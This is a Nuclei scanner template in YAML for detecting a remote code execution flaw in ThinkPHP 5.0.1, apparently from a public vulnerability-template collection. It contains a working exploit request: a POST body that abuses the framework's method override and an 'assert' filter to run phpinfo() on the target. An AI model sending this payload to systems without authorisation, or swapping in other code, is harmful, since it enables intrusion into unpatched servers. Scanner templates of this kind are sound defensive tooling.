nuclei-templates/vulnerabilities/thinkphp/thinkphp-501-rce.yaml

35 lines
823 B
YAML

id: thinkphp-501-rce
info:
name: ThinkPHP 5.0.1 - Remote Code Execution
author: lark-lab
severity: critical
description: ThinkPHP 5.0.1 allows remote unauthenticated attackers to execute arbitrary code via the 's' parameter.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-77
tags: thinkphp,rce
requests:
- method: POST
path:
- "{{BaseURL}}/?s=index/index/index"
body: "s=phpinfo()&_method=__construct&filter=assert"
headers:
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
words:
- "PHP Extension"
- "PHP Version"
condition: and
- type: status
status:
- 200
# Enhanced by mp on 2022/05/31